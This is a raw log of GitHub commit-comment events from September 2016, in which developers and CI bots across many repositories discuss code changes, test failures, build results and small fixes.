{"id":"4528345462","type":"CommitCommentEvent","actor":{"login":"ebeshero"},"repo":{"name":"ebeshero/DHClass-Hub"},"payload":{"comment":{"id":18930128,"position":22,"line":22,"path":"Class-Examples/KublaKhan_version1.xml","commit_id":"dc6a4f645ed03fe3f35ce0db0e75982efbb8d1fb","created_at":"2016-09-07T15:20:50Z","updated_at":"2016-09-07T15:20:50Z","body":"@ahunker @msb81 @etj27 Ping! from line 22"}},"created_at":"2016-09-07T15:20:50Z"}
{"id":"4528345871","type":"CommitCommentEvent","actor":{"login":"ariswood"},"repo":{"name":"ariswood/my_project"},"payload":{"comment":{"id":18930129,"position":null,"line":null,"path":null,"commit_id":"cbd9e05b0a363d226de132b7f485ea4c50d9d951","created_at":"2016-09-07T15:20:53Z","updated_at":"2016-09-07T15:20:53Z","body":"Practicing coding"}},"created_at":"2016-09-07T15:20:53Z"}
{"id":"4528347020","type":"CommitCommentEvent","actor":{"login":"CheYulin"},"repo":{"name":"JingkaiTang/github-play"},"payload":{"comment":{"id":18930132,"position":null,"line":null,"path":null,"commit_id":"51b550425a91a97480714fe9bc63cb5112f6f729","created_at":"2016-09-07T15:21:03Z","updated_at":"2016-09-07T15:21:03Z","body":"话说这么多文件是要干嘛。。。"}},"created_at":"2016-09-07T15:21:03Z"}
{"id":"4528349210","type":"CommitCommentEvent","actor":{"login":"balsmn"},"repo":{"name":"eclipse/leshan"},"payload":{"comment":{"id":18930136,"position":86,"line":86,"path":"leshan-server-cf/src/main/java/org/eclipse/leshan/server/californium/impl/InMemoryLwM2mObservationStore.java","commit_id":"df29e7b361ee49422583af5386dff9cfd24cd7d1","created_at":"2016-09-07T15:21:23Z","updated_at":"2016-09-07T15:21:23Z","body":"Manuel,\r\n\r\nIt seems parseRequest() method is not available in the DataParser class. May be it is not checked in? I am getting compilation error due to this."}},"created_at":"2016-09-07T15:21:23Z"}
{"id":"4528350979","type":"CommitCommentEvent","actor":{"login":"sigxcpu76"},"repo":{"name":"tcncloud/agi-node"},"payload":{"comment":{"id":18930138,"position":null,"line":null,"path":null,"commit_id":"1d2d195cc4e467941417d44cc6e1883e0d2f3436","created_at":"2016-09-07T15:21:38Z","updated_at":"2016-09-07T15:21:38Z","body":"I think I've updated it. Thanks for your report."}},"created_at":"2016-09-07T15:21:38Z"}
{"id":"4528351194","type":"CommitCommentEvent","actor":{"login":"soeron"},"repo":{"name":"aspnet/Security"},"payload":{"comment":{"id":18930139,"position":null,"line":null,"path":null,"commit_id":"d291bb7c249ae989ea848c8ff378186ae42606d1","created_at":"2016-09-07T15:21:40Z","updated_at":"2016-09-07T15:21:40Z","body":"When is this planned to be included? 1.1.0?"}},"created_at":"2016-09-07T15:21:40Z"}
{"id":"4528355972","type":"CommitCommentEvent","actor":{"login":"lex128"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":18930153,"position":null,"line":null,"path":null,"commit_id":"d446e3dbc4114e2141273f036ebd7b54571347bf","created_at":"2016-09-07T15:22:24Z","updated_at":"2016-09-07T15:22:24Z","body":":+1:"}},"created_at":"2016-09-07T15:22:24Z"}
{"id":"4528357129","type":"CommitCommentEvent","actor":{"login":"royrwood"},"repo":{"name":"h2database/h2database"},"payload":{"comment":{"id":18930155,"position":null,"line":null,"path":null,"commit_id":"5b8374a2a9ef74aaab5a9b156bceee30cc7bfb48","created_at":"2016-09-07T15:22:34Z","updated_at":"2016-09-07T15:22:34Z","body":"@svladykin I'm looking at the unit tests as suggested, and have a couple of questions....\r\n\r\n1) Is there any way to run a specific test, rather than all of them?  I've tried the usual maven-surefire syntax like \"./mvnw -Dtest=TestScriptSimple test\" and \"./build.sh -Dtest=TestScriptSimple test\" but that doesn't work.\r\n\r\n2) When I run the full battery of tests on a clean tree, I see some errors, which surprised me (e.g. in TestScriptSimple, the \"select timestampdiff(YEAR,'2002-05-01','2001-01-01')\" test fails with a returned result of -2 instead of the -1 expected); I am just ignoring this for now, though I would have expected all the unit tests in a clean tree to pass, no?\r\n\r\n3) Looking at the TestPgServer code, it looks like the test loads the actual Postgres driver and then points it at an H2 instance that is able to more-or-less emulate a real Postgres database-- is that right?  Neat trick!\r\n\r\n4) Speaking of Postgres, the test are complaining about the driver version I have (see stack trace below).  What version of the driver should I have installed?  I don't see any mention of version numbers on the H2 web pages....\r\n\r\n\r\nERROR: FAIL java.lang.UnsupportedClassVersionError: org/postgresql/Driver : Unsupported major.minor version 52.0 java.lang.UnsupportedClassVersionError: org/postgresql/Driver : Unsupported major.minor version 52.0 ------------------------------\r\njava.lang.UnsupportedClassVersionError: org/postgresql/Driver : Unsupported major.minor version 52.0\r\n\tat java.lang.ClassLoader.defineClass1(Native Method)\r\n\tat java.lang.ClassLoader.defineClassCond(ClassLoader.java:637)\r\n\tat java.lang.ClassLoader.defineClass(ClassLoader.java:621)\r\n\tat java.security.SecureClassLoader.defineClass(SecureClassLoader.java:141)\r\n\tat java.net.URLClassLoader.defineClass(URLClassLoader.java:283)\r\n\tat java.net.URLClassLoader.access$000(URLClassLoader.java:58)\r\n\tat java.net.URLClassLoader$1.run(URLClassLoader.java:197)\r\n\tat java.security.AccessController.doPrivileged(Native Method)\r\n\tat java.net.URLClassLoader.findClass(URLClassLoader.java:190)\r\n\tat java.lang.ClassLoader.loadClass(ClassLoader.java:306)\r\n\tat sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:301)\r\n\tat java.lang.ClassLoader.loadClass(ClassLoader.java:247)\r\n\tat java.lang.Class.forName0(Native Method)\r\n\tat java.lang.Class.forName(Class.java:171)\r\n\tat org.h2.test.synth.TestRandomCompare.testRandom(TestRandomCompare.java:51)\r\n\tat org.h2.test.synth.TestRandomCompare.test(TestRandomCompare.java:42)\r\n\tat org.h2.test.TestBase.runTest(TestBase.java:148)\r\n\tat org.h2.test.TestAll.addTest(TestAll.java:901)\r\n\tat org.h2.test.TestAll.test(TestAll.java:774)\r\n\tat org.h2.test.TestAll.runTests(TestAll.java:583)\r\n\tat org.h2.test.TestAll.testAll(TestAll.java:528)\r\n\tat org.h2.test.TestAll.run(TestAll.java:480)\r\n\tat org.h2.test.TestAll.main(TestAll.java:421)\r\n\tat org.h2.test.TestAllJunit.testFast(TestAllJunit.java:21)\r\n\tat sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\r\n\tat sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39)\r\n\tat sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)\r\n\tat java.lang.reflect.Method.invoke(Method.java:597)\r\n\tat org.junit.runners.model.FrameworkMethod$1.runReflectiveCall(FrameworkMethod.java:50)\r\n\tat org.junit.internal.runners.model.ReflectiveCallable.run(ReflectiveCallable.java:12)\r\n\tat org.junit.runners.model.FrameworkMethod.invokeExplosively(FrameworkMethod.java:47)\r\n\tat org.junit.internal.runners.statements.InvokeMethod.evaluate(InvokeMethod.java:17)\r\n\tat org.junit.runners.ParentRunner.runLeaf(ParentRunner.java:325)\r\n\tat org.junit.runners.BlockJUnit4ClassRunner.runChild(BlockJUnit4ClassRunner.java:78)\r\n\tat org.junit.runners.BlockJUnit4ClassRunner.runChild(BlockJUnit4ClassRunner.java:57)\r\n\tat org.junit.runners.ParentRunner$3.run(ParentRunner.java:290)\r\n\tat org.junit.runners.ParentRunner$1.schedule(ParentRunner.java:71)\r\n\tat org.junit.runners.ParentRunner.runChildren(ParentRunner.java:288)\r\n\tat org.junit.runners.ParentRunner.access$000(ParentRunner.java:58)\r\n\tat org.junit.runners.ParentRunner$2.evaluate(ParentRunner.java:268)\r\n\tat org.junit.runners.ParentRunner.run(ParentRunner.java:363)\r\n\tat org.apache.maven.surefire.junit4.JUnit4Provider.execute(JUnit4Provider.java:367)\r\n\tat org.apache.maven.surefire.junit4.JUnit4Provider.executeWithRerun(JUnit4Provider.java:274)\r\n\tat org.apache.maven.surefire.junit4.JUnit4Provider.executeTestSet(JUnit4Provider.java:238)\r\n\tat org.apache.maven.surefire.junit4.JUnit4Provider.invoke(JUnit4Provider.java:161)\r\n\tat org.apache.maven.surefire.booter.ForkedBooter.invokeProviderInSameClassLoader(ForkedBooter.java:290)\r\n\tat org.apache.maven.surefire.booter.ForkedBooter.runSuitesInProcess(ForkedBooter.java:242)\r\n\tat org.apache.maven.surefire.booter.ForkedBooter.main(ForkedBooter.java:121)"}},"created_at":"2016-09-07T15:22:34Z"}
{"id":"4528357180","type":"CommitCommentEvent","actor":{"login":"Taloth"},"repo":{"name":"sabnzbd/sabnzbd"},"payload":{"comment":{"id":18930156,"position":null,"line":null,"path":null,"commit_id":"748ca0ea27c973948c6985a3ea5bb621a56306a2","created_at":"2016-09-07T15:22:35Z","updated_at":"2016-09-07T15:22:35Z","body":"That's nice, I'll put that validation error under a version check.\r\nWe never threw it up as an issue because sabnzbd no longer recommended the feature in the first place: https://forums.sabnzbd.org/viewtopic.php?f=2&t=17414#p93969\r\nI was planning to release another Sonarr master version within days, so I'll get that in and released before sab gets to final. "}},"created_at":"2016-09-07T15:22:35Z"}
{"id":"4528363160","type":"CommitCommentEvent","actor":{"login":"Writtic"},"repo":{"name":"ENOW-IJI/console"},"payload":{"comment":{"id":18930162,"position":null,"line":null,"path":null,"commit_id":"9214c4ac561bd56799e7b6d429b1d7995b24198b","created_at":"2016-09-07T15:23:30Z","updated_at":"2016-09-07T15:23:30Z","body":"Incredible job"}},"created_at":"2016-09-07T15:23:30Z"}
{"id":"4528372174","type":"CommitCommentEvent","actor":{"login":"OftenLin"},"repo":{"name":"0ften/0ften"},"payload":{"comment":{"id":18930183,"position":null,"line":null,"path":null,"commit_id":"30913e759df51c26709026237dce7b46a01c6dc8","created_at":"2016-09-07T15:24:47Z","updated_at":"2016-09-07T15:24:47Z","body":"I don't know what to push so make the commit to memory it @_@"}},"created_at":"2016-09-07T15:24:47Z"}
{"id":"4528379204","type":"CommitCommentEvent","actor":{"login":"augustoamerico"},"repo":{"name":"rstudio/bookdown-demo"},"payload":{"comment":{"id":18930198,"position":null,"line":null,"path":null,"commit_id":"23ba576aa59b84b0e2b3b07be7fcf60e655985b8","created_at":"2016-09-07T15:25:52Z","updated_at":"2016-09-07T15:25:52Z","body":"yes.\r\n\r\nAnother thing that I forget to tell is that I am not running with the \"Build -> Build All\", I am trying to do this by run \r\n```\r\nrmarkdown::render_site(input = \".\", output_format = \"pdf_document\")\r\n```"}},"created_at":"2016-09-07T15:25:52Z"}
{"id":"4528379712","type":"CommitCommentEvent","actor":{"login":"yonbergman"},"repo":{"name":"odedmagger/CuisineRoRTraining"},"payload":{"comment":{"id":18930199,"position":4,"line":30,"path":".gitignore","commit_id":"cce62c00f19ec0540ead33e925e0c71015067308","created_at":"2016-09-07T15:25:57Z","updated_at":"2016-09-07T15:25:57Z","body":"add `.idea` to gitignore and "}},"created_at":"2016-09-07T15:25:57Z"}
{"id":"4528381951","type":"CommitCommentEvent","actor":{"login":"tim740"},"repo":{"name":"tim740/skAliases"},"payload":{"comment":{"id":18930205,"position":null,"line":null,"path":null,"commit_id":"15a369944fe8c9892f73216456e3176ee9cca358","created_at":"2016-09-07T15:26:18Z","updated_at":"2016-09-07T15:26:18Z","body":"fixed in 1.9.6"}},"created_at":"2016-09-07T15:26:18Z"}
{"id":"4528391121","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18930227,"position":null,"line":null,"path":null,"commit_id":"714e7e1170a3aa127c1d11fb21d1fc418aa97cbb","created_at":"2016-09-07T15:27:39Z","updated_at":"2016-09-07T15:27:39Z","body":"FixCentroidForNonconvex (JasonGlazer) - x86_64-MacOS-10.9-clang: OK (2324 of 2326 tests passed, 24 test warnings)\n\n * 5 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ big diffs.\n * 2 tests had: Table big diffs.\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 15 tests had: ESO small diffs.\n * 13 tests had: MTR small diffs.\n * 1 test had: Table small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-714e7e1170a3aa127c1d11fb21d1fc418aa97cbb-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-714e7e1170a3aa127c1d11fb21d1fc418aa97cbb-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.91%25-yellow.svg)</a> \n"}},"created_at":"2016-09-07T15:27:39Z"}
{"id":"4528393523","type":"CommitCommentEvent","actor":{"login":"melke"},"repo":{"name":"cescoffier/vertx-cache"},"payload":{"comment":{"id":18930231,"position":null,"line":null,"path":null,"commit_id":"7ac6c9cf6bae13fb62203dbf3ec52dd8af9d2401","created_at":"2016-09-07T15:28:02Z","updated_at":"2016-09-07T15:28:02Z","body":"Hi @cescoffier \r\nI'm currently part of a large project where we need to cache objects locally in JVM:s, preferrably a non-replicated cache. So we are looking for a non-blocking in-JVM cache implementation. Would you say this implementation is stable, or would you recommend another caching lib? Thanks /Mats"}},"created_at":"2016-09-07T15:28:02Z"}
{"id":"4528397014","type":"CommitCommentEvent","actor":{"login":"benjello"},"repo":{"name":"openfisca/openfisca-france"},"payload":{"comment":{"id":18930238,"position":null,"line":null,"path":null,"commit_id":"7b957f004226d18a9fc31e3ee5f8f15806876786","created_at":"2016-09-07T15:28:33Z","updated_at":"2016-09-07T15:28:33Z","body":"@fpagnoux : could you please merge bareme-ipp with master ? This PR  introduces some conflicts and you are more likely to solve them than myself\r\n\r\nWe should try to commit our changes to both branches otherwise I do lose a lot of time rebasing stuff since I am not complete aware of context.\r\n\r\n@cbenz "}},"created_at":"2016-09-07T15:28:33Z"}
{"id":"4528397931","type":"CommitCommentEvent","actor":{"login":"beikov"},"repo":{"name":"Blazebit/blaze-persistence"},"payload":{"comment":{"id":18930239,"position":null,"line":null,"path":null,"commit_id":"49203b7675a5a9f58996c91ca341a0d1b8306fb5","created_at":"2016-09-07T15:28:41Z","updated_at":"2016-09-07T15:28:41Z","body":"Looking forward to here your feedback :)"}},"created_at":"2016-09-07T15:28:41Z"}
{"id":"4528397941","type":"CommitCommentEvent","actor":{"login":"PieR-E"},"repo":{"name":"PieR-E/VelovWaitingTimeProject"},"payload":{"comment":{"id":18930240,"position":107,"line":121,"path":"fortest.py","commit_id":"096a66c1ae208a7bb05073e042e05272e0b9976d","created_at":"2016-09-07T15:28:41Z","updated_at":"2016-09-07T15:28:41Z","body":"Tu as tort c'est très bon pourtant\n\nDate: Wed, 7 Sep 2016 07:09:55 -0700\nFrom: notifications@github.com\nTo: VelovWaitingTimeProject@noreply.github.com\nCC: richaud.pierre@outlook.fr; author@noreply.github.com\nSubject: Re: [PieR-E/VelovWaitingTimeProject] New works on general working script (096a66c)\n\nLa loi de Poisson, moi je ne trouve pas ça terrible.\n\n\n—\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub, or mute the thread.\n\n\n  \n  \n\n\n \t\t \t   \t\t  "}},"created_at":"2016-09-07T15:28:41Z"}
{"id":"4528398529","type":"CommitCommentEvent","actor":{"login":"NewEraCracker"},"repo":{"name":"NewEraCracker/pfsense"},"payload":{"comment":{"id":18930241,"position":null,"line":null,"path":null,"commit_id":"8dee84f4cef55a2f008a319022a762b92e00117e","created_at":"2016-09-07T15:28:46Z","updated_at":"2016-09-07T15:28:46Z","body":"But that file is apparently used by browser.js used on diag_edit.php page... I think it is a bad idea to remove it."}},"created_at":"2016-09-07T15:28:46Z"}
{"id":"4528399797","type":"CommitCommentEvent","actor":{"login":"HlopchaMaly"},"repo":{"name":"HlopchaMaly/Task01"},"payload":{"comment":{"id":18930243,"position":4,"line":4,"path":"Main.java","commit_id":"0b5d3d8ed3d3a974e0f65d3c435af5b950bf3e35","created_at":"2016-09-07T15:28:58Z","updated_at":"2016-09-07T15:28:58Z","body":"111"}},"created_at":"2016-09-07T15:28:58Z"}
{"id":"4528399989","type":"CommitCommentEvent","actor":{"login":"skywalkman2210"},"repo":{"name":"dkelz16/HangMan"},"payload":{"comment":{"id":18930247,"position":null,"line":null,"path":null,"commit_id":"d15110a804476f806d8f21db0f1972a3778a6cf7","created_at":"2016-09-07T15:28:59Z","updated_at":"2016-09-07T15:28:59Z","body":"gonna need to redo these... haha"}},"created_at":"2016-09-07T15:28:59Z"}
{"id":"4528401791","type":"CommitCommentEvent","actor":{"login":"NewEraCracker"},"repo":{"name":"pfsense/pfsense"},"payload":{"comment":{"id":18930252,"position":null,"line":null,"path":null,"commit_id":"8dee84f4cef55a2f008a319022a762b92e00117e","created_at":"2016-09-07T15:29:16Z","updated_at":"2016-09-07T15:29:16Z","body":"But that file is apparently used by browser.js used on diag_edit.php page... I think it is a bad idea to remove it."}},"created_at":"2016-09-07T15:29:16Z"}
{"id":"4528403581","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18930256,"position":null,"line":null,"path":null,"commit_id":"3f6261efcd4bb89c8717d573b61507419b102ea4","created_at":"2016-09-07T15:29:31Z","updated_at":"2016-09-07T15:29:31Z","body":"TeamCity libpalaso :: palaso-trusty64-lfmerge Continuous [Build 2.6.67.3f6261efcd4bb89c8717d573b61507419b102ea4](http://build.palaso.org/viewLog.html?buildId=76509&buildTypeId=PalasoPrecise64lfmergeContinuous) outcome was **FAILURE**\nSummary: Tests failed: 4 (4 new), passed: 3466, ignored: 107 Build time: 00:05:46\n### Failed tests\n```\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.ReleaseLock_LockedByActiveProcess_LockFileExists: <no details avaliable>\n\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.TryAcquireLock_LockedByActiveProcess_ReturnsFalse: <no details avaliable>\n\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.TryAcquireLock_LockedByActiveProcessNotTimedOut_ReturnsFalse: <no details avaliable>\n\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.TryAcquireLock_LockedByActiveProcessTimedOut_ReturnsTrue: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-07T15:29:31Z"}
{"id":"4528405667","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18930261,"position":null,"line":null,"path":null,"commit_id":"3f6261efcd4bb89c8717d573b61507419b102ea4","created_at":"2016-09-07T15:29:48Z","updated_at":"2016-09-07T15:29:48Z","body":"TeamCity libpalaso :: palaso-win32-master Continuous [Build 3.0.759.3f6261efcd4bb89c8717d573b61507419b102ea4](http://build.palaso.org/viewLog.html?buildId=76511&buildTypeId=bt223) outcome was **SUCCESS**\nSummary: Tests passed: 3490, ignored: 126 Build time: 00:05:31"}},"created_at":"2016-09-07T15:29:48Z"}
{"id":"4528407835","type":"CommitCommentEvent","actor":{"login":"Vascoding"},"repo":{"name":"sasholilov/hello-world"},"payload":{"comment":{"id":18930271,"position":null,"line":null,"path":null,"commit_id":"97783d43d973d4c9931462f42c2aa347642f892c","created_at":"2016-09-07T15:30:09Z","updated_at":"2016-09-07T15:30:09Z","body":"Yeeep\r\n![img_2701](https://cloud.githubusercontent.com/assets/22049685/18318135/14fb8732-7529-11e6-8738-21fd43aa5d78.JPG)\r\n"}},"created_at":"2016-09-07T15:30:09Z"}
{"id":"4528410079","type":"CommitCommentEvent","actor":{"login":"benjello"},"repo":{"name":"openfisca/openfisca-france"},"payload":{"comment":{"id":18930276,"position":null,"line":null,"path":null,"commit_id":"7b957f004226d18a9fc31e3ee5f8f15806876786","created_at":"2016-09-07T15:30:27Z","updated_at":"2016-09-07T15:30:27Z","body":"@fpagnoux : try not to remove your inline comments on the baremes-ipp PR since I am dealing with them right now !"}},"created_at":"2016-09-07T15:30:27Z"}
{"id":"4528411233","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18930280,"position":null,"line":null,"path":null,"commit_id":"3f6261efcd4bb89c8717d573b61507419b102ea4","created_at":"2016-09-07T15:30:36Z","updated_at":"2016-09-07T15:30:36Z","body":"TeamCity libpalaso :: palaso-precise64-libpalaso-2.6 Continuous [Build 2.6.1094.3f6261efcd4bb89c8717d573b61507419b102ea4](http://build.palaso.org/viewLog.html?buildId=76508&buildTypeId=PalasoPrecise64v26Cont) outcome was **SUCCESS**\nSummary: Tests passed: 3470, ignored: 107 Build time: 00:06:55"}},"created_at":"2016-09-07T15:30:36Z"}
{"id":"4528412351","type":"CommitCommentEvent","actor":{"login":"PlekhanovA"},"repo":{"name":"xdevelnet/temp"},"payload":{"comment":{"id":18930284,"position":79,"line":91,"path":"ore_growth_original_utf8.txt","commit_id":"25faeae07b5dc9a1c9aaba9a3eeaa98cfcc40cdf","created_at":"2016-09-07T15:30:45Z","updated_at":"2016-09-07T15:30:45Z","body":"Тут всё правильно было. В своих переводах вместе с троеточием я использую следующие знаки:\r\n?..\r\n!..\r\n?!.\r\nНасколько я знаю, нужно писать именно так. Правда последний знак выглядит ужасно, поэтому я его почти не использую."}},"created_at":"2016-09-07T15:30:45Z"}
{"id":"4528414874","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":18930289,"position":null,"line":null,"path":null,"commit_id":"37288d8274a5e4bab77eecd545707714939c38fb","created_at":"2016-09-07T15:31:10Z","updated_at":"2016-09-07T15:31:10Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/32351/testReport/) for this commit**"}},"created_at":"2016-09-07T15:31:10Z"}
{"id":"4528416873","type":"CommitCommentEvent","actor":{"login":"Imperfect888"},"repo":{"name":"Imperfect888/PDA_Atlas"},"payload":{"comment":{"id":18930293,"position":15,"line":15,"path":"sketch_aug28a.ino","commit_id":"4a15921791207afeddd3ae56dc14ec62a182e9a4","created_at":"2016-09-07T15:31:26Z","updated_at":"2016-09-07T15:31:26Z","body":"gnjgfjf"}},"created_at":"2016-09-07T15:31:26Z"}
{"id":"4528424089","type":"CommitCommentEvent","actor":{"login":"pdgonzalez872"},"repo":{"name":"taylorzr/capybara-webkit"},"payload":{"comment":{"id":18930303,"position":20,"line":51,"path":"lib/capybara/webkit/connection.rb","commit_id":"627a43e8605c327128ce95f0f635d4ae3cd5c113","created_at":"2016-09-07T15:32:33Z","updated_at":"2016-09-07T15:32:33Z","body":"very cool!"}},"created_at":"2016-09-07T15:32:33Z"}
{"id":"4528426945","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18930309,"position":null,"line":null,"path":null,"commit_id":"f44afc854de480f842c2e702bd237b9ba473e07c","created_at":"2016-09-07T15:32:59Z","updated_at":"2016-09-07T15:32:59Z","body":"@ishitatsuyuki set up a host for the docs that is waaaaaaaay faster than that one. Also, it's already in the wiki :P"}},"created_at":"2016-09-07T15:32:59Z"}
{"id":"4528430578","type":"CommitCommentEvent","actor":{"login":"guddnjs91"},"repo":{"name":"HyOsori/Osori-Algorithm"},"payload":{"comment":{"id":18930317,"position":9,"line":9,"path":"HyeongJun/sort/Makefile","commit_id":"e8b1c6b3a56161c53921e380a0eb21cba55ba8da","created_at":"2016-09-07T15:33:32Z","updated_at":"2016-09-07T15:33:32Z","body":"CFLAGS means C compiler option.\r\nYou need to assign SRCS directory for list up source files.\r\n\r\nI recommend this site. http://bowbowbow.tistory.com/12"}},"created_at":"2016-09-07T15:33:32Z"}
{"id":"4528431651","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18930321,"position":null,"line":null,"path":null,"commit_id":"f44afc854de480f842c2e702bd237b9ba473e07c","created_at":"2016-09-07T15:33:41Z","updated_at":"2016-09-07T15:33:41Z","body":"https://storage.googleapis.com/itx-technologies-141911.appspot.com/docs/genisys/index.html"}},"created_at":"2016-09-07T15:33:41Z"}
{"id":"4528433243","type":"CommitCommentEvent","actor":{"login":"Hostiphre"},"repo":{"name":"Hostiphre/M0921"},"payload":{"comment":{"id":18930325,"position":149,"line":393,"path":"Part_II_Theory/2B._rotational_invariant_expansion.tex","commit_id":"6cae09ea37bf49e4ce9e84ae950f8dc4fae57d04","created_at":"2016-09-07T15:33:55Z","updated_at":"2016-09-07T15:33:55Z","body":"I mean 'coordinate systems'"}},"created_at":"2016-09-07T15:33:55Z"}
{"id":"4528435784","type":"CommitCommentEvent","actor":{"login":"nicksuch"},"repo":{"name":"Upper-Polo/todo_list"},"payload":{"comment":{"id":18930330,"position":null,"line":null,"path":null,"commit_id":"11fe218efde336314b0bb5441c6b61bd57e734a5","created_at":"2016-09-07T15:34:17Z","updated_at":"2016-09-07T15:34:17Z","body":"Closes #3 "}},"created_at":"2016-09-07T15:34:17Z"}
{"id":"4528435989","type":"CommitCommentEvent","actor":{"login":"toddmotto"},"repo":{"name":"ngmigrate/ngmigrate.github.io"},"payload":{"comment":{"id":18930331,"position":165,"line":165,"path":"_posts/2016-09-07-from-nganimate-to-angular-animate.md","commit_id":"e5b2b513efd037ff1cb460040108182796c71445","created_at":"2016-09-07T15:34:19Z","updated_at":"2016-09-07T15:34:19Z","body":"This is the problem line(s)"}},"created_at":"2016-09-07T15:34:19Z"}
{"id":"4528437115","type":"CommitCommentEvent","actor":{"login":"pvcs15"},"repo":{"name":"amadeusproject/uxdesign-html"},"payload":{"comment":{"id":18930334,"position":null,"line":null,"path":null,"commit_id":"a2a41f69e4636cdc50f30379f7b1d6ec91b17dd0","created_at":"2016-09-07T15:34:27Z","updated_at":"2016-09-07T15:34:27Z","body":"Ok. Vou arrumar.\n\nEm 7 de set de 2016 7:52 AM, \"juliotoscano\" <notifications@github.com>\nescreveu:\n\n> O header está sem a tag Body. Por favor inserir.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/amadeusproject/uxdesign-html/commit/a2a41f69e4636cdc50f30379f7b1d6ec91b17dd0#commitcomment-18926447>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASfw003E5ydxX0yTGsq-KBpkDqx9pHKxks5qnpd_gaJpZM4J2yhB>\n> .\n>\n"}},"created_at":"2016-09-07T15:34:27Z"}
{"id":"4528437059","type":"CommitCommentEvent","actor":{"login":"gauravchaurasiy"},"repo":{"name":"gauravchaurasiy/test"},"payload":{"comment":{"id":18930335,"position":null,"line":null,"path":null,"commit_id":"73dfe46b449cf4e8eb50630d3ca90e9a81621b04","created_at":"2016-09-07T15:34:28Z","updated_at":"2016-09-07T15:34:28Z","body":"this is red color file "}},"created_at":"2016-09-07T15:34:28Z"}
{"id":"4528441983","type":"CommitCommentEvent","actor":{"login":"xdevelnet"},"repo":{"name":"xdevelnet/temp"},"payload":{"comment":{"id":18930356,"position":79,"line":91,"path":"ore_growth_original_utf8.txt","commit_id":"25faeae07b5dc9a1c9aaba9a3eeaa98cfcc40cdf","created_at":"2016-09-07T15:35:13Z","updated_at":"2016-09-07T15:35:13Z","body":"Упс. А это я уже завтыкал. Ctrl+F-ом искал по шаблону \"...\" и недосмотрел знак вопроса."}},"created_at":"2016-09-07T15:35:13Z"}
{"id":"4528442969","type":"CommitCommentEvent","actor":{"login":"thss15fyt"},"repo":{"name":"thss15fyt/Plants-VS-Zombies"},"payload":{"comment":{"id":18930359,"position":null,"line":null,"path":null,"commit_id":"5b790c64bc985925e04fb2dac4f244d549606d4a","created_at":"2016-09-07T15:35:21Z","updated_at":"2016-09-07T15:35:21Z","body":"\">\" to \">=\""}},"created_at":"2016-09-07T15:35:21Z"}
{"id":"4528443707","type":"CommitCommentEvent","actor":{"login":"gauravchaurasiy"},"repo":{"name":"gauravchaurasiy/test"},"payload":{"comment":{"id":18930362,"position":null,"line":null,"path":null,"commit_id":"73dfe46b449cf4e8eb50630d3ca90e9a81621b04","created_at":"2016-09-07T15:35:28Z","updated_at":"2016-09-07T15:35:28Z","body":"test "}},"created_at":"2016-09-07T15:35:28Z"}
{"id":"4528443948","type":"CommitCommentEvent","actor":{"login":"junghans"},"repo":{"name":"votca/csg"},"payload":{"comment":{"id":18930363,"position":26,"line":469,"path":"share/xml/csg_defaults.xml.in","commit_id":"9b46a942f01bbe3ea406a5b155b7e168a0facce0","created_at":"2016-09-07T15:35:30Z","updated_at":"2016-09-07T15:35:30Z","body":"@schererc: Is is wrong! You made `<dist>` an global option, not a interaction option, so remove these 3 lines again."}},"created_at":"2016-09-07T15:35:30Z"}
{"id":"4528444569","type":"CommitCommentEvent","actor":{"login":"e419"},"repo":{"name":"BlackCab/vshashkah"},"payload":{"comment":{"id":18930365,"position":null,"line":null,"path":null,"commit_id":"36012821ffdf670c6c63eb59ef48d5c788ff4cfb","created_at":"2016-09-07T15:35:35Z","updated_at":"2016-09-07T15:35:35Z","body":"fucking excelent :100: "}},"created_at":"2016-09-07T15:35:35Z"}
